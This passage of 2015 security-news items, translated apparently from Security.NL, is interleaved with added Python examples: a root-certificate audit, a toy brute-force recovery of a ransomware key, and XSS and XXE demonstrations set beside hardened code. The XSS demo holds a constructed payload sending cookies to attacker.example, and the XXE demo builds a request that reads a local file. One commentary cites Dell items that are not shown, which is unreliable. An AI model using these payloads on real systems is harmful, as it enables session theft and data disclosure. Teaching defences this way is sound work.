Nevertheless, the researchers do not give negative advice. According to Caspers the study provides a sound basis for determining the security that TrueCrypt and its derivatives can provide. In Germany a customised version of TrueCrypt called Trusted Disk has been developed, and the research may also help improve such programs, according to the BSI.

New Ransomware Variant Linux Uses OpenSSL



Researchers have discovered a new variant of the ransomware that encrypts Linux web servers. Linux.Encoder.2, as this variant is called, in fact appeared earlier than Linux.Encoder.1, about which warnings were issued in early November. The second variant would have been used in September and October.

The attackers deliberately target WordPress websites and web shops running Magento. Exactly how they get in is, according to Russian anti-virus company Doctor Web, not yet known. Once access to the server is obtained files are encrypted and victims receive a message that they must pay. One difference between the first and second variants is the use of OpenSSL instead of PolarSSL; why the creators changed SSL library is unknown.

Like the first variant, the second can also be decrypted, so that victims do not have to pay. The decryption tools, however, do not remove the attackers' shell script from the infected server, so the attackers can infect the server again. Victims are advised to contact the police, not to change the contents of encrypted directories and not to delete files from the server.

Monday, 23 November 2015

Fuss About Self-Signed Certificate On Dell Laptops


On the internet there is fuss about a self-signed certificate with which all Dell laptops would be delivered. On social news site Reddit reader Kevin Hicks reports how he discovered a self-signed root certificate called eDellRoot on his new Dell XPS laptop. It could allow users to be attacked, for example via malware that uses the certificate.

The certificate on the Dell laptops comes with its own private key, which is marked as non-exportable. The key has nevertheless been found to be copyable. Dell user Joe Nord discovered the same root certificate with the same private key on his laptop. According to Nord and Hicks this is exactly the same situation as the Lenovo Superfish debacle: Lenovo's laptops came with adware that could intercept encrypted traffic using a self-signed certificate in order to inject advertisements.

In the case of Dell, however, the situation looks rather different. The certificate cannot be used to issue other certificates, for example to perform man-in-the-middle attacks on HTTPS sites, says another reader on Reddit. There is nevertheless criticism that Dell does not use a certificate from a valid certificate authority. Dell told Hicks that eDellRoot is a trusted certificate and not a threat. After Hicks remarked that the certificate is indeed a security risk, the Dell Webcare team announced that the company will come with an explanation for the certificate's presence. A spokesman confirmed to Security.NL that Dell will give an explanation later today.
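The three Dell items above (the Reddit report, Dell's removal announcement and Duo Security's discovery of a second eDellRoot certificate with a different key) all come down to one question for an administrator: is there a self-signed root in my trust store that I did not put there, and which one is it? The following is an added example, not code from Dell, Duo or the researchers. It walks the DER structure of each certificate with a minimal ASN.1 reader, flags self-signed certificates whose common name is not on an allowlist, and reports the SHA-256 fingerprint so that two certificates with the same name but different keys can be told apart. The sample store, the toy DER encoder that builds it and the allowlist are constructed for the demo; the certificates carry placeholder keys and signatures and are not real Dell certificates.

```python
import hashlib

# --- minimal DER (ASN.1) reader: enough to walk an X.509 certificate ---
def read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, content, next_pos) for the TLV element starting at pos."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                                   # long form: n length bytes follow
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def children(content: bytes):
    """Split a constructed element's content into its (tag, content) parts."""
    out, pos = [], 0
    while pos < len(content):
        tag, body, pos = read_tlv(content, pos)
        out.append((tag, body))
    return out

OID_NAMES = {b"\x55\x04\x03": "CN", b"\x55\x04\x0a": "O", b"\x55\x04\x06": "C"}

def parse_name(name_content: bytes) -> dict:
    """Name ::= SEQUENCE OF SET OF SEQUENCE { OID, value }  ->  {'CN': ..., 'O': ...}"""
    attrs = {}
    for _, rdn_set in children(name_content):
        for _, atv in children(rdn_set):
            (_, oid), (_, value) = children(atv)[:2]
            attrs[OID_NAMES.get(oid, oid.hex())] = value.decode("utf-8", "replace")
    return attrs

def parse_certificate(der: bytes) -> dict:
    _, cert, _ = read_tlv(der)                          # Certificate ::= SEQUENCE
    _, tbs, _ = read_tlv(cert)                          # tbsCertificate ::= SEQUENCE
    fields = children(tbs)
    if fields[0][0] == 0xA0:                            # optional explicit [0] version
        fields = fields[1:]
    # fields: serial, signatureAlgorithm, issuer, validity, subject, subjectPublicKeyInfo, ...
    issuer, subject = fields[2][1], fields[4][1]
    return {
        "subject": parse_name(subject),
        "issuer": parse_name(issuer),
        "self_signed": issuer == subject,               # root certificates name themselves as issuer
        "sha256": hashlib.sha256(der).hexdigest(),
    }

def audit_roots(der_certs, allowed_root_cns):
    """Flag self-signed certificates whose CN is not on the allowlist: (CN, fingerprint)."""
    return [
        (info["subject"].get("CN"), info["sha256"])
        for info in map(parse_certificate, der_certs)
        if info["self_signed"] and info["subject"].get("CN") not in allowed_root_cns
    ]

# --- constructed sample store (NOT real Dell certificates): a toy DER encoder ---
def der(tag: int, content: bytes) -> bytes:
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

def name(cn: str, org: str) -> bytes:
    def ava(oid, value):                                # SET { SEQUENCE { OID, UTF8String } }
        return der(0x31, der(0x30, der(0x06, oid) + der(0x0C, value.encode())))
    return der(0x30, ava(b"\x55\x04\x0a", org) + ava(b"\x55\x04\x03", cn))

def toy_cert(subject: bytes, issuer: bytes) -> bytes:
    """Structurally valid, cryptographically meaningless certificate (placeholder key/signature)."""
    rsa_sha256 = der(0x30, der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b") + der(0x05, b""))
    rsa_key = der(0x30, der(0x30, der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01") + der(0x05, b""))
                    + der(0x03, b"\x00" * 17))
    validity = der(0x30, der(0x17, b"150801000000Z") + der(0x17, b"391231235959Z"))
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01") + rsa_sha256
              + issuer + validity + subject + rsa_key)
    return der(0x30, tbs + rsa_sha256 + der(0x03, b"\x00" * 17))

def sample_store():
    edell = name("eDellRoot", "Dell Inc.")
    good = name("Example Root CA", "Example Corp")
    leaf = name("www.example.com", "Example Corp")
    return [toy_cert(edell, edell), toy_cert(good, good), toy_cert(leaf, good)]

def demo():
    """Allowlist is an assumption for the demo: only 'Example Root CA' is expected."""
    return audit_roots(sample_store(), allowed_root_cns={"Example Root CA"})
```

On a Windows machine the same audit can be run over the real machine store with the standard library, since `ssl.enum_certificates("ROOT")` returns the DER bytes of every root certificate: `audit_roots([c for c, enc, _ in ssl.enum_certificates("ROOT") if enc == "x509_asn"], allowed)`. The fingerprint column is what distinguishes the two eDellRoot certificates Duo reported; a bare name match would treat them as one.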

Researcher Cracks DecryptorMax-Ransomware


A German researcher has succeeded in cracking the recently appeared DecryptorMax ransomware, allowing victims to recover their files for free. Like other ransomware, DecryptorMax encrypts all kinds of files on the computer.

A warning then appears stating that a ransom must be paid. Unlike other ransomware such as CryptoWall, where the ransom amount doubles after a certain time, DecryptorMax gives victims 24 hours; otherwise the decryption key is deleted and the encrypted files can never be decrypted.

Fabian Wosar of Emsisoft Anti-Malware has now discovered that it is possible to retrieve the decryption key by brute force, so victims do not have to pay the ransom. Wosar developed a tool called DecryptInfinite to retrieve the key. The tool requires an unencrypted version of one of the encrypted files; victims who do not have one can, for example, download an unencrypted PNG file from the internet.

Then the email address that the ransomware shows the victim in its warning must be entered. The tool uses this information to brute-force the decryption key, which can take some time. When the key is found the tool displays it. Prevention is better than cure, however, and internet users are advised to be cautious with email attachments: DecryptorMax spreads through email attachments posing as job vacancies, reports the forum Bleeping Computer.
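The Linux.Encoder item above and the DecryptorMax crack both rest on the same weakness: the decryption key is reachable by brute force, and a piece of known plaintext (for DecryptorMax the clean copy of a file that DecryptInfinite asks for; in the PNG tip above, simply the fixed first bytes of a PNG) is enough to confirm the right candidate. The following is an added example, not the malware's code nor Wosar's or Bitdefender's tool. It uses a toy scheme constructed for illustration in which the key is derived from a PRNG seeded with the encryption timestamp, and shows how the encrypted file's modification time narrows the search to a few thousand candidates; the seed window, the "mtime lag" and the sample file are all assumptions of the demo.

```python
import hashlib
import random

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"   # first 8 bytes of every PNG file: free known plaintext

def key_from_seed(seed: int) -> bytes:
    """Toy key schedule modelling the flaw: a PRNG seeded only with a timestamp."""
    return random.Random(seed).getrandbits(256).to_bytes(32, "big")

def keystream(key: bytes, length: int) -> bytes:
    """Deterministic keystream: SHA-256(key || block counter), concatenated."""
    out, block = bytearray(), 0
    while len(out) < length:
        out += hashlib.sha256(key + block.to_bytes(8, "big")).digest()
        block += 1
    return bytes(out[:length])

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def toy_encrypt(plaintext: bytes, seed: int) -> bytes:
    """What the toy ransomware does: seed = encryption time, then XOR with the keystream."""
    return xor_bytes(plaintext, keystream(key_from_seed(seed), len(plaintext)))

toy_decrypt = toy_encrypt   # XOR stream cipher: the same operation both ways

def recover_seed(ciphertext: bytes, known_prefix: bytes, mtime: int, window: int = 3600):
    """Brute force: the file's mtime bounds the seed space; the known prefix
    (a clean copy of the file, or just its format magic) confirms the hit."""
    n = len(known_prefix)
    for seed in range(int(mtime) - window, int(mtime) + window + 1):
        if xor_bytes(ciphertext[:n], keystream(key_from_seed(seed), n)) == known_prefix:
            return seed
    return None

def recover_file(ciphertext: bytes, known_prefix: bytes, mtime: int, window: int = 3600):
    """Return the decrypted file, or None if no seed in the window reproduces the prefix."""
    seed = recover_seed(ciphertext, known_prefix, mtime, window)
    return None if seed is None else toy_decrypt(ciphertext, seed)

def demo(plaintext: bytes = PNG_MAGIC + bytes(range(256)) * 4, encrypted_at: int = 1448000000) -> bool:
    """Encrypt at a fixed 'time', assume the file's mtime was stamped a minute later
    (constructed lag), and check that the file comes back without the key."""
    ciphertext = toy_encrypt(plaintext, encrypted_at)
    observed_mtime = encrypted_at + 60
    return recover_file(ciphertext, PNG_MAGIC, observed_mtime) == plaintext
```

The point of the search bound is the one that undid Linux.Encoder: once the key depends on nothing the attacker's own filesystem does not record, the "decryption key" the ransom note threatens to delete is not needed at all. Eight bytes of known plaintext give a false-positive probability of about 7,200 / 2^64 across the whole window, so a match is conclusive.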

FBI Warns Officials For Attacks By Hacktivists


The FBI has issued a warning that alerts police officers and other government staff to cyber attacks by hacktivists. Besides attacks in which information about officers and officials is gathered and published, attacks have also been observed that attempt to break into the email accounts of officers and officials.

Recently an old private email account of the CIA director was cracked. According to the FBI the use of social media can increase the chance of being attacked. The attacks are not aimed directly at the person but are carried out via, for example, the ISP or email provider: attackers use social engineering to extract information from these parties, which eventually gives them access to the email accounts.

Actions

To limit such attacks the FBI advises using two-factor authentication, turning on privacy settings, limiting one's social media footprint, not posting information about one's job or function online, being careful with online replies, choosing answers to secret questions that cannot simply be guessed, regularly changing passwords that should also be longer than 15 characters, and advising family members to secure their accounts properly as well. The FBI also advises government personnel to periodically check what information about them can be found online.

Sunday, 22 November 2015

Starwood Hotels Hit By Malware Infection



Starwood Hotels & Resorts Worldwide has announced that 54 of its hotels in North America were infected with malware that gave unauthorised access to credit card information. The malware was detected in payment systems in souvenir shops, restaurants and other retail outlets.

The 54 compromised hotels are located throughout the United States and Canada; the complete list has been published here. The hotels were infected from November 2014 until 30 June of this year.

The stolen data include customer names, credit card numbers, security codes and expiration dates. Starwood states that there was no access to other customer data such as addresses, dates of stay and loyalty card information.

Starwood Hotels & Resorts includes the Sheraton, Westin and W Hotels brands, but also hotels such as the Palace Hotel in San Francisco and the Walt Disney World Dolphin Resort in Orlando.

Starwood urges customers who visited the affected hotels to keep a close eye on their bank statements. Starwood claims to have taken extra security measures after removing the malware to prevent such an attack from happening again.

It is certainly not the first time, and probably not the last, that a hotel chain has fallen victim to a so-called point-of-sale malware infection. Similar attacks were discovered in recent months at the Hilton and Trump hotels.

Saturday, 21 November 2015

XSS Vulnerability Addressed In LinkedIn



Business networking site LinkedIn has fixed a cross-site scripting (XSS) vulnerability in its website. Security expert Rohit Dua from India posted a message about the flaw on Full Disclosure on Wednesday. The LinkedIn Help forum did not have adequate protection; the LinkedIn profile pages were not vulnerable.


To exploit the vulnerability a user had to be logged in. When starting a discussion on the Help pages an attacker could place script code in the form fields. The code was then executed and was also served to other visitors.

LinkedIn fixed the vulnerability, with Dua's help, within three hours, writes Threatpost. According to a LinkedIn spokesman users' private data was at no time in danger and the vulnerability was not abused.
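What the item describes is a stored XSS: a form field whose contents are written into the page unescaped and then served to every later visitor. The following is an added example, not LinkedIn's code. It renders a constructed forum post two ways, once by concatenating the fields into HTML and once with context-aware encoding, and shows why escaping alone is not enough for a link field, where a `javascript:` URL survives HTML-escaping untouched and has to be rejected by scheme instead. The payload, the field names and the "source" link are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

# Constructed payload of the kind a stored-XSS bug lets an attacker save in a form field.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'

def render_post_vulnerable(author: str, body: str, link: str) -> str:
    """Untrusted field values are concatenated straight into the page."""
    return (f'<div class="post"><b>{author}</b>'
            f'<p>{body}</p><a href="{link}">source</a></div>')

def safe_href(url: str) -> str:
    """Only http(s) links survive; javascript:, data:, vbscript: etc. become a dead link."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in ("http", "https") else "#"

def render_post_hardened(author: str, body: str, link: str) -> str:
    """Escape for the HTML text and attribute contexts; validate the URL scheme separately,
    because html.escape() leaves 'javascript:alert(1)' perfectly intact."""
    return (f'<div class="post"><b>{html.escape(author)}</b>'
            f'<p>{html.escape(body)}</p>'
            f'<a href="{html.escape(safe_href(link), quote=True)}">source</a></div>')

def executable_script_in(page: str) -> bool:
    """Crude marker used only to compare the two renderers: does a raw <script> tag
    or a javascript: href survive into the served page?"""
    low = page.lower()
    return "<script" in low or 'href="javascript:' in low
```

`html.escape()` is the right tool for text nodes and double-quoted attribute values, which is why the hardened renderer uses it in both places; the URL check is the extra step that the attribute context needs. Protocol-relative links (`//host/path`) are also turned into `#` by the scheme allowlist, which is the conservative choice for user-supplied links on a help forum.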

PayPal Phishing Site On World Bank Group Website



A website run by the World Bank Group was compromised this week. The site climatesmartplanning.org, which was provided with a valid Extended Validation (EV) SSL certificate, briefly hosted a phishing site with a PayPal login page that could hardly be distinguished from the real one.

Visitors were asked to sign in with their PayPal credentials, which were captured and sent to the criminals.

The site then showed a message that the account data was temporarily unavailable and that additional verification was required. Visitors were asked to enter their name, date of birth, address and telephone number and finally their credit card number plus the CVV code, writes Netcraft. Those who completed everything were eventually redirected to the real PayPal website.

According to Netcraft the criminals were able to take advantage of the Extended Validation SSL certificate of climatesmartplanning.org, which made it appear as if the site could be trusted. The EV certificate has since been revoked.

The Climate Smart Planning Platform is a World Bank-led initiative to provide practitioners working on climate change in developing countries with tools, data and knowledge.

Microsoft Improves Edge Browser In Windows 10


Microsoft has made its Edge browser in Windows 10 safer: the browser is now also resistant to unwanted DLL injections. The new version of Edge, with the EdgeHTML 13 rendering engine built into Windows 10, no longer supports ActiveX and Browser Helper Objects, which better protects the user against so-called binary injection attacks.

Browsers are a favourite target of attackers. Anyone who manages to modify an advertisement the user sees, or to add one, can earn a lot of money, Microsoft says. Attackers therefore increasingly use browser injections. The user notices this, for example, when a toolbar has suddenly been added to the browser or the home page has been surreptitiously changed.

In Microsoft Edge that will no longer happen, writes Microsoft. The browser blocks unauthorised DLL injections, except when they are part of a Windows component or a signed device driver. "Only DLLs that are either Microsoft-signed or Windows Hardware Quality Lab (WHQL)-signed are allowed." According to Microsoft the new enhancements make browsing faster, safer and more stable.

Friday, 20 November 2015

"Apple's Siri Reveals Personal Data"


Users of an iPhone or iPad who value their privacy are better off not using the voice assistant Siri. Experts at Trend Micro maintain that someone holding an iPhone or iPad on which Siri is activated can obtain the owner's full name, email address, phone number and profile picture within 30 seconds, regardless of whether the device is locked.

Data

Whoever has the phone in hand can retrieve all kinds of information by voice, such as name, contact information and even calendar appointments. By speaking the command 'what is my name', for example, Siri states the owner's full name. There are a number of such commands that Siri answers even when the smartphone or tablet is locked.

Privacy

According to Trend Micro this is a weakness of Siri about which users have complained on internet forums for some time. Not only the privacy of the iPhone or iPad owner is at stake, but also that of the person's contacts.

Apple told the security company in a response that users can disable Siri on the lock screen. This can be done via the Settings menu under the 'Touch ID & Passcode' option, and then 'Siri', where the personal assistant can be switched off.

VMware Warns Of Vulnerability In Adobe Flex Software


VMware has warned of a vulnerability in a software module of Adobe Flex that is used in a number of products, including vCenter Server and vCloud Director. According to the advisory, VMware vCenter Server 5.5 and older are vulnerable; only version 6.0 of vCenter Server is not.

Upgrading

"If you do not want to run unnecessary risks, we advise you to upgrade to a higher version of our products," a VMware spokesman responds briefly. Users of vCloud Director 6.0 and Horizon are advised to install the upgrade from VMware.

The timing of the alert is striking. VMware released its security advisory on Wednesday, while the problem has been known since August; Adobe warned about it at that time.

An attacker can send a specially crafted XML request to the server to cause unintended data to be disclosed.
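A crafted XML document that makes the server disclose data it never meant to return is the signature of XML external entity (XXE) processing: the document declares an entity whose value is a local file, and the parser obligingly reads the file and substitutes it into the request. The following is an added example, not VMware's or Adobe's code. It plants a constructed secret file, builds an XXE request against it, and parses the same request with a parser that has external general entities enabled and with a hardened one that refuses any DTD; the file name, the element names and the entity name are assumptions of the demo.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

class TextCollector(ContentHandler):
    """Collects character data: that is where an expanded entity's contents end up."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

def xxe_request(file_uri: str) -> bytes:
    """Constructed malicious request: an external entity that points at a local file."""
    return (f'<?xml version="1.0"?>'
            f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{file_uri}">]>'
            f'<r><v>&xxe;</v></r>').encode()

def parse_vulnerable(xml_bytes: bytes) -> str:
    """Server-side parser with external general entities enabled (the defect)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)

def parse_hardened(xml_bytes: bytes) -> str:
    """Reject any DTD up front (no entities of any kind, which also stops entity-expansion
    bombs) and keep external entity resolution off."""
    if b"<!DOCTYPE" in xml_bytes:          # the keyword is case-sensitive in XML
        raise ValueError("DTD not allowed in client XML")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)

def demo() -> dict:
    """Plant a secret file (constructed), then feed the same request to both parsers."""
    secret = pathlib.Path(tempfile.mkdtemp()) / "db-password.txt"
    secret.write_text("hunter2")
    request = xxe_request(secret.as_uri())
    leaked = parse_vulnerable(request)
    try:
        parse_hardened(request)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked": leaked, "blocked": blocked}
```

The vulnerable parser returns the file's contents as if they were part of the request, which is exactly the "unintended data disclosed" of the advisory; with an `http://` system identifier instead of `file://` the same mechanism turns the server into a proxy for internal addresses. Refusing the DTD outright is the simplest fix when the application never needs one.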

Large Malvertising Campaign Unraveled


Malwarebytes claims to have exposed one of the largest malvertising campaigns of recent months. The campaign redirected large numbers of visitors to casino websites while their computers were infected with malware.

The campaign targeted visitors of somewhat dubious websites, including torrent sites, live streams of the latest films and pirated software. Some advertisements on those sites automatically sent visitors, without any click on the ad, to one of the casino sites.


Iframes

Those sites served as a diversion while, in the background, iframes from a variety of domains were loaded, which ultimately delivered the Angler exploit kit to the victim's computer. Since this week the Neutrino exploit kit would also be in use.

The ad campaign would have started on 21 October and lasted at least three weeks. That it went on so long is, according to Malwarebytes, because neither visitors nor administrators of the dubious torrent sites had much reason to report abuse, since they themselves were dealing in illegal content.

According to SimilarWeb, a service that collects and analyses website traffic data, the ad networks involved generated more than two billion visits in October.

Thursday, 19 November 2015

Amazon Adds Two-Factor Authentication


Amazon has quietly enabled two-factor authentication for its web shop. The option is not yet prominently displayed. Logging in to Amazon normally requires a username and password; for extra security users can now also receive a code on their phone that they must enter when logging in.

Two-factor authentication makes it harder for attackers to log in as someone else, because they then need not only the username and password but also access to the phone.

An Engadget employee discovered the new option this week. According to reports on Twitter Amazon introduced the two-factor authentication about two weeks ago.

Two-factor authentication is a widely used method to prevent abuse of stolen login credentials. Other major internet companies that offer it include Google, Twitter and Facebook.

Amazon users who want to use two-factor authentication can enable it in their account settings under the 'advanced settings'.

Botnet Tool Uses Twitter Direct Messages



Cyber criminals can now control a botnet via Direct Messages on Twitter. The Python program, called Twittor, was inspired by GCAT, a similar program that lets command & control traffic be run over Gmail. Twittor was made by self-described security researcher Paul Amar and has been available since September, but has now been noticed by Sophos.

The tool uses direct messages on Twitter. Their "advantage" compared with a conventional command & control server is that direct messages on Twitter are private, and the traffic is not stopped by IP filtering because Twittor uses the Twitter API.

In addition Twitter announced earlier this year that the 140-character limit for direct messages would be lifted, which allows more malicious traffic per message. The limitation is that at most 1,000 direct messages per day can be sent, so a botmaster can manage no more than roughly 100 bots per account.

Many security tools, such as Nmap and Metasploit, are useful not only to cyber criminals but also to security researchers. Publishing a free tool that makes it possible to operate a botnet via Twitter direct messages nevertheless seems an odd way of doing security research, says John Zorabedian of Sophos.